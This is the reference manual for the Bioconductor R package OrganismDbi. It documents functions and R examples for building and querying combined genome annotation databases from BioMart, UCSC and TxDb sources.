2024-11-27
|
2024-11-27
|
ac98968637dcf18951d2390707113a557a4ea872
|
Package ‘OrganismDbi’
November 21, 2016
Title Software to enable the smooth interfacing of different database packages
Description The package enables a simple unified interface to several annotation packages each of which has its own schema by taking advantage of the fact that each of these packages implements a select methods.
Version 1.16.0
Author Marc Carlson, Herve Pages, Martin Morgan, Valerie Obenchain
Maintainer Biocore Data Team <maintainer@bioconductor.org>
Depends R (>= 2.14.0), methods, BiocGenerics (>= 0.15.10), AnnotationDbi (>= 1.33.15), GenomicFeatures (>= 1.23.31)
Imports Biobase, BiocInstaller, GenomicRanges, graph, IRanges, RBGL, RSQLite, S4Vectors (>= 0.9.25), stats
Suggests Homo.sapiens, Rattus.norvegicus, BSgenome.Hsapiens.UCSC.hg19, AnnotationHub, FDb.UCSC.tRNAs, rtracklayer, biomaRt, RUnit
License Artistic-2.0
biocViews Annotation, Infrastructure
NeedsCompilation no
R topics documented:
makeOrganismDbFromBiomart ........................................ 2
makeOrganismDbFromTxDb ........................................... 4
makeOrganismDbFromUCSC ............................................. 6
makeOrganismPackage ................................................. 7
mapToTranscripts ................................................... 9
MultiDb-class ...................................................... 11
rangeBasedAccessors ............................................. 14
Index 18
**makeOrganismDbFromBiomart**
*Make a OrganismDb object from annotations available on a BioMart database*
**Description**
The `makeOrganismDbFromBiomart` function allows the user to make a OrganismDb object from transcript annotations available on a BioMart database. This object has all the benefits of a TxDb, plus an associated OrgDb and GODb object.
**Usage**
```r
makeOrganismDbFromBiomart(biomart = "ENSEML_MART_ENSEMBL",
dataset = "hsapiens_gene_ensembl",
transcript_ids = NULL,
circ_seqs = DEFAULT_CIRC_SEQS,
filter = "",
id_prefix = "ensembl_",
host = "www.ensembl.org",
port = 80,
miRBaseBuild = NA,
keytype = "ENSEMBL",
orgdb = NA)
```
**Arguments**
- `biomart` which BioMart database to use. Get the list of all available BioMart databases with the `listMarts` function from the biomaRt package. See the details section below for a list of BioMart databases with compatible transcript annotations.
- `dataset` which dataset from BioMart. For example: "hsapiens_gene_ensembl", "mmusculus_gene_ensembl", "dmelanogaster_gene_ensembl", "celegans_gene_ensembl", "scerevisiae_gene_ensembl", etc in the ensembl database. See the examples section below for how to discover which datasets are available in a given BioMart database.
- `transcript_ids` optionally, only retrieve transcript annotation data for the specified set of transcript ids. If this is used, then the meta information displayed for the resulting TxDb object will say 'Full dataset: no'. Otherwise it will say 'Full dataset: yes'. This TxDb object will be embedded in the resulting OrganismDb object.
- `circ_seqs` a character vector to list out which chromosomes should be marked as circular.
- `filter` Additional filters to use in the BioMart query. Must be a named list. An example is `filter = as.list(c(source = "entrez"))`
- `port` The port to use in the HTTP communication with the host.
- `id_prefix` Specifies the prefix used in BioMart attributes. For example, some BioMarts may have an attribute specified as "ensembl_transcript_id" whereas others have the same attribute specified as "transcript_id". Defaults to "ensembl_".
makeOrganismDbFromBiomart
miRBaseBuild specify the string for the appropriate build Information from mirbase.db to use for microRNAs. This can be learned by calling supportedMiRBaseBuildValues. By default, this value will be set to NA, which will inactivate the microRNAs accessor.
keytype This indicates the kind of key that this database will use as a foreign key between it’s TxDb object and it’s OrgDb object. So basically whatever the column name is for the foreign key from your OrgDb that your TxDb will need to map it’s GENEID on to. By default it is "ENSEMBL" since the GENEID’s for most biomaRt based TxDb will be ensembl gene ids and therefore they will need to map to ENSEMBL gene mappings from the associated OrgDb object.
orgdb By default, makeOrganismDbFromBiomart will use the taxonomyID from your txdb to lookup an appropriate matching OrgDb object but using this you can supply a different OrgDb object.
Details
makeOrganismDbFromBiomart is a convenience function that feeds data from a BioMart database to the lower level OrganismDb constructor. See ?makeOrganismDbFromUCSC for a similar function that feeds data from the UCSC source.
The listMarts function from the biomaRt package can be used to list all public BioMart databases. Not all databases returned by this function contain datasets that are compatible with (i.e. understood by) makeOrganismDbFromBiomart. Here is a list of datasets known to be compatible (updated on Sep 24, 2014):
- All the datasets in the main Ensembl database: use biomart="ensembl".
- All the datasets in the Ensembl Fungi database: use biomart="fungi_mart_XX" where XX is the release version of the database e.g. "fungi_mart_22".
- All the datasets in the Ensembl Metazoa database: use biomart="metazoa_mart_XX" where XX is the release version of the database e.g. "metazoa_mart_22".
- All the datasets in the Ensembl Plants database: use biomart="plants_mart_XX" where XX is the release version of the database e.g. "plants_mart_22".
- All the datasets in the Ensembl Protists database: use biomart="protists_mart_XX" where XX is the release version of the database e.g. "protists_mart_22".
- All the datasets in the Gramene Mart: use biomart="ENSEMBL_MART_PLANT".
Not all these datasets have CDS information.
Value
A OrganismDb object.
Author(s)
M. Carlson and H. Pages
See Also
- makeOrganismDbFromUCSC for convenient ways to make a OrganismDb object from UCSC online resources.
- The listMarts, useMart, and listDatasets functions in the biomaRt package.
- DEFAULT_CIRC_SEQS.
makeOrganismDbFromTxDb
Make an OrganismDb object from an existing TxDb object.
Description
The makeOrganismDbFromTxDb function allows the user to make a OrganismDb object from an existing TxDb object.
Usage
makeOrganismDbFromTxDb(txdb, keytype=NA, orgdb=NA)
**makeOrganismDbFromTxDb**
**Arguments**
- **txdb**: a TxDb object.
- **keytype**: By default, `makeOrganismDbFromTxDb` will try to guess this information based on the OrgDb object that is inferred to go with your TxDb object. But in some instances, you may need to supply an over-ride and that is what this argument is for. It is the column name of the ID type that your OrgDb will use as a foreign key when connecting to the data from the associated TxDb. So for example, if you looked at the Homo.sapiens package the keytype for `org.Hs.eg.db`, would be ‘ENTREZID’ because that is the kind of ID that matches up with it’s TxDb GENEID. (Because the GENEID for that specific TxDb is from UCSC and uses entrez gene IDs).
- **orgdb**: By default, `makeOrganismDbFromTxDb` will use the taxonomyID from your txdb to lookup an appropriate matching OrgDb object but using this you can supply a different OrgDb object.
**Details**
`makeOrganismDbFromTxDb` is a convenience function that processes a TxDb object and pairs it up with GO.db and an appropriate OrgDb object to make a OrganismDb object. See ?`makeOrganismDbFromBiomart` and ?`makeOrganismDbFromUCSC` for a similar function that feeds data from either a BioMart or UCSC.
**Value**
A OrganismDb object.
**Author(s)**
M. Carlson and H. Pages
**See Also**
- `makeOrganismDbFromBiomart` for convenient ways to make a OrganismDb object from BioMart online resources.
- The OrganismDb class.
**Examples**
```r
## lets start with a txdb object
transcript_ids <- c(
"uc009uzf.1",
"uc009uzg.1",
"uc009uzh.1",
"uc009uzi.1",
"uc009uzj.1"
)
# Using that, we can call our function to promote it to an OrgDb object:
odb <- makeOrganismDbFromTxDb(txdb=txdbMouse)
columns(odb)
```
makeOrganismDbFromUCSC
Make a OrganismDb object from annotations available at the UCSC Genome Browser
Description
The makeOrganismDbFromUCSC function allows the user to make a OrganismDb object from transcript annotations available at the UCSC Genome Browser.
Usage
```r
makeOrganismDbFromUCSC(
genome = "hg19",
tablename = "knownGene",
transcript_ids = NULL,
circ_seqs = DEFAULT_CIRC_SEQS,
url = "http://genome.ucsc.edu/cgi-bin/",
goldenPath_url = "http://hgdownload.cse.ucsc.edu/goldenPath",
miRBaseBuild = NA
)
```
Arguments
- `genome` genome abbreviation used by UCSC and obtained by `ucscGenomes()[, "db"]`. For example: "hg19".
- `tablename` name of the UCSC table containing the transcript annotations to retrieve. Use the `supportedUCSCtables` utility function to get the list of supported tables. Note that not all tables are available for all genomes.
- `transcript_ids` optionally, only retrieve transcript annotation data for the specified set of transcript ids. If this is used, then the meta information displayed for the resulting OrganismDb object will say 'Full dataset: no'. Otherwise it will say 'Full dataset: yes'.
- `circ_seqs` a character vector to list out which chromosomes should be marked as circular.
- `url`, `goldenPath_url` use to specify the location of an alternate UCSC Genome Browser.
- `miRBaseBuild` specify the string for the appropriate build Information from mirbase.db to use for microRNAs. This can be learned by calling `supportedMiRBaseBuildValues`. By default, this value will be set to NA, which will inactivate the microRNAs accessor.
Details
makeOrganismDbFromUCSC is a convenience function that feeds data from the UCSC source to the lower level OrganismDb function. See `?makeOrganismDbFromBiomart` for a similar function that feeds data from a BioMart database.
Value
A OrganismDb object.
makeOrganismPackage
Author(s)
M. Carlson and H. Pages
See Also
- `makeOrganismDbFromBiomart` for convenient ways to make a `OrganismDb` object from BioMart online resources.
- `ucscGenomes` in the `rtracklayer` package.
- `DEFAULT_CIRC_SEQS`.
- The `supportedMiRBaseBuildValues` function for listing all the possible values for the `miRBaseBuild` argument.
- The `OrganismDb` class.
Examples
```r
## Display the list of genomes available at UCSC:
library(rtracklayer)
ucscGenomes()[, "db"]
## Display the list of tables supported by makeOrganismDbFromUCSC():
supportedUCSCtables()
## Not run:
## Retrieving a full transcript dataset for Yeast from UCSC:
odb1 <- makeOrganismDbFromUCSC(genome="sacCer2", tablename="ensGene")
## End(Not run)
## Retrieving an incomplete transcript dataset for Mouse from UCSC
## (only transcripts linked to Entrez Gene ID 22290):
transcript_ids <- c(
"uc009uzf.1",
"uc009uzg.1",
"uc009uzh.1",
"uc009uzi.1",
"uc009uzj.1"
)
odb2 <- makeOrganismDbFromUCSC(genome="mm9", tablename="knownGene",
transcript_ids=transcript_ids)
odb2
```
Description
`makeOrganismPackage` is a method that generates a package that will load an appropriate `annotationOrganismDb` object that will in turn point to existing annotation packages.
Usage
```
makeOrganismPackage (pkgname, graphData, organism, version, maintainer, author, destDir, license="Artistic-2.0")
```
Arguments
- **pkgname**: What is the desired package name. Traditionally, this should be the genus and species separated by a ".". So as an example, "Homo.sapiens" would be the package name for human.
- **graphData**: A list of short character vectors. Each character vector in the list is exactly two elements long and represents a join relationship between two packages. The names of these character vectors are the package names and the values are the foreign keys that should be used to connect each package. All foreign keys must be values that can be returned by the columns method for each package in question, and obviously they also must be the same kind of identifier as well.
- **organism**: The name of the organism this package represents.
- **version**: What is the version number for this package?
- **maintainer**: Who is the package maintainer? (must include email to be valid)
- **author**: Who is the creator of this package?
- **destDir**: A path where the package source should be assembled.
- **license**: What is the license (and it’s version)
Details
The purpose of this method is to create a special package that will depend on existing annotation packages and which will load a special `annotationOrganismDb` object that will allow proper dispatch of special select methods. These methods will allow the user to easily query across multiple annotation resources via information contained by the `annotationOrganismDb` object. Because the end result will be a package that treats all the data mapped together as a single source, the user is encouraged to take extra care to ensure that the different packages used are from the same build etc.
Value
A special package to load an `OrganismDb` object.
Author(s)
M. Carlson
See Also
`OrganismDb`
Examples
```r
## set up the list with the relevant relationships:
gd <- list(join1 = c(GO.db="GOID", org.Hs.eg.db="GO"),
join2 = c(org.Hs.eg.db="ENTREZID",
TxDb.Hsapiens.UCSC.hg19.knownGene="GENEID"))
## sets up a temporary directory for this example
## (users won’t need to do this step)
destination <- tempfile()
dir.create(destination)
## makes an Organism package for human called Homo.sapiens
if(interactive()){
makeOrganismPackage(pkgname = "Homo.sapiens",
graphData = gd,
organism = "Homo sapiens",
version = "1.0.0",
maintainer = "Bioconductor Package Maintainer <maintainer@bioconductor.org>",
author = "Bioconductor Core Team",
destDir = destination,
license = "Artistic-2.0")
}
```
---
mapToTranscripts
*Map range coordinates between transcripts and genome space*
Description
Map range coordinates between features in the transcriptome and genome (reference) space.
See `?mapToAlignments` in the `GenomicAlignments` package for mapping coordinates between reads (local) and genome (reference) space using a CIGAR alignment.
Usage
```r
## S4 method for signature ‘ANY,MultiDb’
mapToTranscripts(x, transcripts,
ignore.strand = TRUE,
extractor.fun = GenomicFeatures::transcripts, ...)
```
Arguments
- `x`
- *GRanges-class* object of positions to be mapped. `x` must have names when mapping to the genome.
- `transcripts`
- The `OrganismDb` object that will be used to extract features using the `extractor.fun`.
- `ignore.strand`
- When `TRUE`, strand is ignored in overlap operations.
- `extractor.fun`
- Function to extract genomic features from a `TxDb` object.
Valid `extractor` functions:
- `transcripts` # default
- `exons`
- `cds`
mapToTranscripts
- genes
- promoters
- disjointExons
- microRNAs
- tRNAs
- transcriptsBy
- exonsBy
- cdsBy
- intronsByTranscript
- fiveUTRsByTranscript
- threeUTRsByTranscript
... Additional arguments passed to extractor.fun functions.
Details
- mapToTranscripts The genomic range in \( x \) is mapped to the local position in the transcripts ranges. A successful mapping occurs when \( x \) is completely within the transcripts range, equivalent to:
\[
\text{findOverlaps}(..., \text{type} = \text{"within"})
\]
Transcriptome-based coordinates start counting at 1 at the beginning of the transcripts range and return positions where \( x \) was aligned. The seqlevels of the return object are taken from the transcripts object and should be transcript names. In this direction, mapping is attempted between all elements of \( x \) and all elements of transcripts.
Value
An object the same class as \( x \).
Parallel methods return an object the same shape as \( x \). Ranges that cannot be mapped (out of bounds or strand mismatch) are returned as zero-width ranges starting at 0 with a seqname of "UNMAPPED".
Non-parallel methods return an object that varies in length similar to a Hits object. The result only contains mapped records, strand mismatch and out of bound ranges are not returned. \( x \)Hits and transcriptsHits metadata columns indicate the elements of \( x \) and transcripts used in the mapping.
When present, names from \( x \) are propagated to the output. When mapping to transcript coordinates, seqlevels of the output are the names on the transcripts object; most often these will be transcript names. When mapping to the genome, seqlevels of the output are the seqlevels of transcripts which are usually chromosome names.
Author(s)
V. Obenchain, M. Lawrence and H. Pages; ported to work with OrganismDbi by Marc Carlson
See Also
- mapToTranscripts.
## Examples
```r
library(Homo.sapiens)
x <- GRanges("chr5",
IRanges(c(173315331, 174151575), width=400,
names=LETTERS[1:2]))
## Map to transcript coordinates:
mapToTranscripts(x, Homo.sapiens)
```
### Description
The OrganismDb class is a container for storing knowledge about existing Annotation packages and the relationships between these resources. The purpose of this object and its associated methods is to provide a means by which users can conveniently query for data from several different annotation resources at the same time using a familiar interface.
The supporting methods `select`, `columns` and `keys` are used together to extract data from an `OrganismDb` object in a manner that should be consistent with how these are used on the supporting annotation resources.
The family of `seqinfo` style getters (`seqinfo`, `seqlevels`, `seqlengths`, `isCircular`, `genome`, and `seqnameStyle`) is also supported for `OrganismDb` objects provided that the object in question has an embedded `TxDb` object.
### Methods
In the code snippets below, `x` is a `OrganismDb` object.
- `keytypes(x)` allows the user to discover which keytypes can be passed in to `select` or `keys` and the `keytype` argument.
- `keys(x, keytype, pattern, column, fuzzy)` returns keys for the database contained in the `TxDb` object.
The `keytype` argument specifies the kind of keys that will be returned and is always required. If `keys` is used with `pattern`, it will pattern match on the `keytype`.
But if the `column` argument is also provided along with the `pattern` argument, then `pattern` will be matched against the values in `column` instead.
If `keys` is called with `column` and no `pattern` argument, then it will return all keys that have corresponding values in the `column` argument.
Thus, the behavior of `keys` all depends on how many arguments are specified.
Use of the `fuzzy` argument will toggle `fuzzy` matching to `TRUE` or `FALSE`. If `pattern` is not used, `fuzzy` is ignored.
- `columns(x)` shows which kinds of data can be returned for the `OrganismDb` object.
select(x, keys, columns, keytype): When all the appropriate arguments are specified, `select` will retrieve the matching data as a dataframe based on parameters for selected keys and columns and keytype arguments.
mapIds(x, keys, columns, keytype, ..., multiVals): When all the appropriate arguments are specified, `mapIds` will retrieve the matching data as a vector or list based on parameters for selected keys and columns and keytype arguments. The `multiVals` argument can be used to choose the format of the values returned. Possible values for `multiVals` are:
- **first**: This value means that when there are multiple matches only the 1st thing that comes back will be returned. This is the default behavior
- **list**: This will just return a list object to the end user
- **filter**: This will remove all elements that contain multiple matches and will therefore return a shorter vector than what came in whenever some of the keys match more than one value
- **asNA**: This will return an NA value whenever there are multiple matches
- **CharacterList**: This just returns a SimpleCharacterList object
- **FUN**: You can also supply a function to the `multiVals` argument for custom behaviors. The function must take a single argument and return a single value. This function will be applied to all the elements and will serve a ‘rule’ that for which thing to keep when there is more than one element. So for example this example function will always grab the last element in each result: `last <- function(x){x[[length(x)]]}`
selectByRanges(x, ranges, columns, overlaps, ignore.strand): When all the appropriate arguments are specified, `selectByRanges` will return an annotated GRanges object that has been generated based on what you passed in to the ranges argument and whether that overlapped with what you specified in the overlaps argument. Internally this function will get annotation features and overlaps by calling the appropriate annotation methods indicated by the overlaps argument. The value for overlaps can be any of: gene, tx, exons, cds, 5utr, introns or 3utr. The default value is 'tx' which will return to you, your annotated ranges based on whether the overlapped with the transcript ranges of any gene in the associated TxDb object based on the gene models it contains. Also: the number of ranges returned to you will match the number of genes that your ranges argument overlapped for the type of overlap that you specified. So if some of your ranges are large and overlap several features then you will get many duplicated ranges returned with one for each gene that has an overlapping feature. The columns values that you request will be returned in the mcols for the annotated GRanges object that is the return value for this function. Finally, the ignore.strand argument is provided to indicate whether or not findOverlaps should ignore or respect the strand.
selectRangesById(x, keys, columns, keytype, feature): When all the appropriate arguments are specified, `selectRangesById` will return a GRangesList object that correspond to gene models GRanges for the keys that you specify with the keys and keytype arguments. The annotation ranges retrieved for this will be specified by the feature argument and can be: gene, tx, exon or cds. The default is 'tx' which will return the transcript ranges for each gene as a GRanges object in the list. Extra data can also be returned in the mcols values for those GRanges by using the columns argument.
resources(x): shows where the db files are for resources that are used to store the data for the OrganismDb object.
TxDb(x): Accessor for the TxDb object of a OrganismDb object.
TxDb(x) <- value: Allows you to swap in an alternative TxDb for a given OrganismDb object. This is most often useful when combined with saveDb(TxDB, file), which returns the saved TxDb, so that you can save a TxDb to disc and then assign the saved version right into your OrganismDb object.
MultiDb-class
Author(s)
Marc Carlson
See Also
- AnnotationDb-class for more description of methods select, keytypes, keys and columns.
- makeOrganismPackage for functions used to generate an OrganismDb based package.
- rangeBasedAccessors for the range based methods used in extracting data from a OrganismDb object.
- seqlevels
- seqlengths
- isCircular
- genome
Examples
```r
## load a package that creates an OrganismDb
library(Homo.sapiens)
ls(2)
## then the methods can be used on this object.
columns <- columns(Homo.sapiens)[c(7,10,11,12)]
keys <- head(keys(org.Hs.eg.db, "ENTREZID"))
keytype <- "ENTREZID"
res <- select(Homo.sapiens, keys, columns, keytype)
head(res)
res <- mapIds(Homo.sapiens, keys=c("Var1", "Var10"), column="ALIAS",
keytype="ENTREZID", multiVals="CharacterList")
## get symbols for ranges in question:
ranges <- GRanges(seqnames=Rle(c("chr11"), c(2)),
IRanges(start=c(107899550, 108025550),
end=c(108291889, 108050000)), strand="*",
seqinfo=seqinfo(Homo.sapiens))
selectByRanges(Homo.sapiens, ranges, "SYMBOL")
## Or extract the gene model for the 'A1BG' gene:
selectRangesById(Homo.sapiens, 'A1BG', keytype='SYMBOL')
## Get the DB connections or DB file paths associated with those for
## each.
dbconn(Homo.sapiens)
dbfile(Homo.sapiens)
## extract the taxonomyId
taxonomyId(Homo.sapiens)
## extract the resources
resources(Homo.sapiens)
```
rangeBasedAccessors Extract genomic features from an object
Description
Generic functions to extract genomic features from an object. This page documents the methods for OrganismDb objects only.
Usage
```r
## S4 method for signature 'MultiDb'
transcripts(x, columns=c("TXID", "TXNAME"), filter=NULL)
## S4 method for signature 'MultiDb'
exons(x, columns="EXONID", filter=NULL)
## S4 method for signature 'MultiDb'
cds(x, columns="CDSID", filter=NULL)
## S4 method for signature 'MultiDb'
genes(x, columns="GENEID", filter=NULL)
## S4 method for signature 'MultiDb'
transcriptsBy(x, by, columns, use.names=FALSE,
outerMcols=FALSE)
## S4 method for signature 'MultiDb'
exonsBy(x, by, columns, use.names=FALSE, outerMcols=FALSE)
## S4 method for signature 'MultiDb'
cdsBy(x, by, columns, use.names=FALSE, outerMcols=FALSE)
## S4 method for signature 'MultiDb'
getTxDbIfAvailable(x, ...)
## S4 method for signature 'MultiDb'
asBED(x)
## S4 method for signature 'MultiDb'
asGFF(x)
## S4 method for signature 'MultiDb'
disjointExons(x, aggregateGenes=FALSE,
includeTranscripts=TRUE, ...)
## S4 method for signature 'MultiDb'
microRNAs(x)
## S4 method for signature 'MultiDb'
tRNAs(x)
## S4 method for signature 'MultiDb'
promoters(x, upstream=2000, downstream=200, ...)
```
## S4 method for signature '/quotesingle.Var
distance(x, y, ignore.strand=FALSE,
...., id, type=c("gene", "tx", "exon", "cds"))
## S4 method for signature '/quotesingle.Var
extractTranscriptSeqs(x, transcripts, strand = "+")
## S4 method for signature '/quotesingle.Var
extractUpstreamSeqs(x, genes, width=1000, exclude.seqlevels=NULL)
## S4 method for signature '/quotesingle.Var
intronsByTranscript(x, use.names=FALSE)
## S4 method for signature '/quotesingle.Var
fiveUTRsByTranscript(x, use.names=FALSE)
## S4 method for signature '/quotesingle.Var
threeUTRsByTranscript(x, use.names=FALSE)
## S4 method for signature '/quotesingle.Var
isActiveSeq(x)
Arguments
x
A MultiDb object. Except for the extractTranscriptSeqs method. In that case it’s a BSgenome object and the second argument is an MultiDb object.
... Arguments to be passed to or from methods.
by
One of "gene", "exon", "cds" or "tx". Determines the grouping.
columns
The columns or kinds of metadata that can be retrieved from the database. All possible columns are returned by using the columns method.
filter
Either NULL or a named list of vectors to be used to restrict the output. Valid names for this list are: "gene_id", "tx_id", "tx_name", "tx_chrom", "tx_strand", "exon_id", "exon_name", "exon_chrom", "exon_strand", "cds_id", "cds_name", "cds_chrom", "cds_strand" and "exon_rank".
use.names
Controls how to set the names of the returned GRangesList object. These functions return all the features of a given type (e.g. all the exons) grouped by another feature type (e.g. grouped by transcript) in a GRangesList object. By default (i.e. if use.names is FALSE), the names of this GRangesList object (aka the group names) are the internal ids of the features used for grouping (aka the grouping features), which are guaranteed to be unique. If use.names is TRUE, then the names of the grouping features are used instead of their internal ids. For example, when grouping by transcript (by="tx"), the default group names are the transcript internal ids ("tx_id"). But, if use.names=TRUE, the group names are the transcript names ("tx_name"). Note that, unlike the feature ids, the feature names are not guaranteed to be unique or even defined (they could be all NAs). A warning is issued when this happens. See ?id2name for more information about feature internal ids and feature external names and how to map the formers to the latters.
Finally, use.names=TRUE cannot be used when grouping by gene by="gene". This is because, unlike for the other features, the gene ids are external ids (e.g. Entrez Gene or Ensembl ids) so the db doesn’t have a "gene_name" column for storing alternate gene names.
rangeBasedAccessors
upstream
For promoters: An integer(1) value indicating the number of bases upstream from the transcription start site. For additional details see `? promoters, GRanges-method`.
downstream
For promoters: An integer(1) value indicating the number of bases downstream from the transcription start site. For additional details see `? promoters, GRanges-method`.
aggregateGenes
For disjointExons: A logical. When `FALSE` (default) exon fragments that overlap multiple genes are dropped. When `TRUE`, all fragments are kept and the gene_id metadata column includes all gene ids that overlap the exon fragment.
includeTranscripts
For disjointExons: A logical. When `TRUE` (default) a tx_name metadata column is included that lists all transcript names that overlap the exon fragment.
y
For distance, a `MultiDb` instance. The id is used to extract ranges from the `MultiDb` which are then used to compute the distance from x.
id
A character vector the same length as x. The id must be identifiers in the `MultiDb` object. type indicates what type of identifier id is.
type
A character(1) describing the id. Must be one of ‘gene’, ‘tx’, ‘exon’ or ‘cds’.
ignore.strand
A logical indicating if the strand of the ranges should be ignored. When `TRUE`, strand is set to `+`.
outerMcols
A logical indicating if the `outer` mcols (metadata columns) should be populated for some range based accesors which return a GRangesList object. By default this is `FALSE`, but if `TRUE` then the outer list object will also have it’s metadata columns populated as well as the mcols for the `inner` GRanges objects.
transcripts
An object representing the exon ranges of each transcript to extract. It must be a GRangesList or MultiDb object while the x is a BSgenome object. Internally, it’s turned into a GRangesList object with `exonsBy(transcripts, by="tx", use.names=TRUE)`.
strand
Only supported when x is a DNAString object.
Can be an atomic vector, a factor, or an Rle object, in which case it indicates the strand of each transcript (i.e. all the exons in a transcript are considered to be on the same strand). More precisely: it’s turned into a factor (or factor-Rle) that has the "standard strand levels" (this is done by calling the strand function on it). Then it’s recycled to the length of RangesList object transcripts if needed. In the resulting object, the i-th element is interpreted as the strand of all the exons in the i-th transcript.
strand can also be a list-like object, in which case it indicates the strand of each exon, individually. Thus it must have the same shape as RangesList object transcripts (i.e. same length plus strand[[i]] must have the same length as transcripts[[i]] for all i).
strand can only contain "+" and/or "-" values. "*" is not allowed.
genes
An object containing the locations (i.e. chromosome name, start, end, and strand) of the genes or transcripts with respect to the reference genome. Only GenomicRanges and MultiDb objects are supported at the moment. If the latter, the gene locations are obtained by calling the genes function on the MultiDb object internally.
width
How many bases to extract upstream of each TSS (transcription start site).
exclude.seqlevels
A character vector containing the chromosome names (a.k.a. sequence levels) to exclude when the genes are obtained from a MultiDb object.
Details
These are the range based functions for extracting transcript information from a MultiDb object.
Value
a GRanges or GRangesList object
Author(s)
M. Carlson
See Also
• MultiDb-class for how to use the simple "select" interface to extract information from a MultiDb object.
• transcripts for the original transcripts method and related methods.
• transcriptsBy for the original transcriptsBy method and related methods.
Examples
```r
## extracting all transcripts from Homo.sapiens with some extra metadata
library(Homo.sapiens)
cols = c("TXNAME","SYMBOL")
res <- transcripts(Homo.sapiens, columns=cols)
## extracting all transcripts from Homo.sapiens, grouped by gene and
## with extra metadata
res <- transcriptsBy(Homo.sapiens, by="gene", columns=cols)
## list possible values for columns argument:
columns(Homo.sapiens)
## Get the TxDb from an MultiDb object (if it's available)
getTxDbIfAvailable(Homo.sapiens)
## Other functions listed above should work in way similar to their TxDb
## counterparts. So for example:
promoters(Homo.sapiens)
## Should give the same value as:
promoters(getTxDbIfAvailable(Homo.sapiens))
```
Index
*Topic methods
mapToTranscripts, 9
rangeBasedAccessors, 14
*Topic utilities
mapToTranscripts, 9
AnnotationDb-class, 13
asBED, MultiDb-method
(rangeBasedAccessors), 14
asGFF, MultiDb-method
(rangeBasedAccessors), 14
BSgenome, 15, 16
cds, MultiDb-method
(rangeBasedAccessors), 14
cdsBy, MultiDb-method
(rangeBasedAccessors), 14
class: MultiDb (MultiDb-class), 11
class: OrganismDb (MultiDb-class), 11
columns, MultiDb-method (MultiDb-class), 11
dbconn, MultiDb-method (MultiDb-class), 11
dbfile, MultiDb-method (MultiDb-class), 11
DEFAULT_CIRC_SEQS, 3, 7
disjointExons, MultiDb-method
(rangeBasedAccessors), 14
distance, GenomicRanges, MultiDb-method
(rangeBasedAccessors), 14
DNAString, 16
exons, MultiDb-method
(rangeBasedAccessors), 14
exonsBy, 16
exonsBy, MultiDb-method
(rangeBasedAccessors), 14
extractTranscriptSeqs, BSgenome-method
(rangeBasedAccessors), 14
extractUpstreamSeqs, MultiDb-method
(rangeBasedAccessors), 14
fiveUTRsByTranscript, MultiDb-method
(rangeBasedAccessors), 14
genes, 16
genes, MultiDb-method
(rangeBasedAccessors), 14
genome, 13
GenomicRanges, 16
getTxDbIfAvailable
(rangeBasedAccessors), 14
getTxDbIfAvailable, MultiDb-method
(rangeBasedAccessors), 14
GRangesList, 15, 16
id2name, 15
intronsByTranscript, MultiDb-method
(rangeBasedAccessors), 14
isActiveSeq, MultiDb-method
(rangeBasedAccessors), 14
isActiveSeq<-, MultiDb-method
(rangeBasedAccessors), 14
isCircular, 13
keys, MultiDb-method (MultiDb-class), 11
keytypes, MultiDb-method
(MultiDb-class), 11
listDatasets, 3
listMarts, 2, 3
makeOrganismDbFromBiomart, 2, 5–7
makeOrganismDbFromTxDb, 4
makeOrganismDbFromUCSC, 3, 5, 6
makeOrganismPackage, 7, 13
mapIds, MultiDb-method (MultiDb-class), 11
mapToAlignments, 9
mapToTranscripts, 9, 10
mapToTranscripts, ANY, MultiDb-method
(mapToTranscripts), 9
metadata, MultiDb-method
(MultiDb-class), 11
microRNAs, MultiDb-method
(rangeBasedAccessors), 14
MultiDb, 15–17
INDEX
MultiDb (MultiDb-class), 11
MultiDb-class, 11, 17
OrganismDb, 2–8, 14
OrganismDb (MultiDb-class), 11
OrganismDb-class (MultiDb-class), 11
promoters, MultiDb-method
(rangeBasedAccessors), 14
rangeBasedAccessors, 13, 14
RangesList, 16
resources (MultiDb-class), 11
resources, MultiDb-method
(MultiDb-class), 11
Rle, 16
select, MultiDb-method (MultiDb-class), 11
selectByRanges (MultiDb-class), 11
selectByRanges, MultiDb-method
(MultiDb-class), 11
selectRangesById (MultiDb-class), 11
selectRangesById, MultiDb-method
(MultiDb-class), 11
seqinfo, MultiDb-method (MultiDb-class), 11
seqlengths, 13
seqlevels, 13
strand, 16
supportedMiRBaseBuildValues, 4, 7
taxonomyId, MultiDb-method
(MultiDb-class), 11
threeUTRsByTranscript, MultiDb-method
(rangeBasedAccessors), 14
transcripts, 17
transcripts, MultiDb-method
(rangeBasedAccessors), 14
transcriptsBy, 17
transcriptsBy, MultiDb-method
(rangeBasedAccessors), 14
tRNAs, MultiDb-method
(rangeBasedAccessors), 14
TxDb, 2, 11
TxDb (MultiDb-class), 11
TxDb, OrganismDb-method (MultiDb-class), 11
TxDb<- (MultiDb-class), 11
TxDb<-, OrganismDb-method
(MultiDb-class), 11
ucscGenomes, 6, 7
useMart, 3
|
{"Source-Url": "http://www.bioconductor.org/packages/release/bioc/manuals/OrganismDbi/man/OrganismDbi.pdf", "len_cl100k_base": 9235, "olmocr-version": "0.1.49", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 45803, "total-output-tokens": 10598, "length": "2e13", "weborganizer": {"__label__adult": 0.00033926963806152344, "__label__art_design": 0.000560760498046875, "__label__crime_law": 0.0003192424774169922, "__label__education_jobs": 0.0010128021240234375, "__label__entertainment": 0.00021946430206298828, "__label__fashion_beauty": 0.00016319751739501953, "__label__finance_business": 0.00026226043701171875, "__label__food_dining": 0.0003790855407714844, "__label__games": 0.0010700225830078125, "__label__hardware": 0.001522064208984375, "__label__health": 0.0004532337188720703, "__label__history": 0.00033020973205566406, "__label__home_hobbies": 0.0001876354217529297, "__label__industrial": 0.0004503726959228515, "__label__literature": 0.00030875205993652344, "__label__politics": 0.0002460479736328125, "__label__religion": 0.0005221366882324219, "__label__science_tech": 0.086669921875, "__label__social_life": 0.0001984834671020508, "__label__software": 0.1165771484375, "__label__software_dev": 0.78759765625, "__label__sports_fitness": 0.0002472400665283203, "__label__transportation": 0.00022995471954345703, "__label__travel": 0.00023984909057617188}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 36335, 0.02773]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 36335, 0.50528]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 36335, 0.71716]], "google_gemma-3-12b-it_contains_pii": [[0, 1577, false], [1577, 3811, null], [3811, 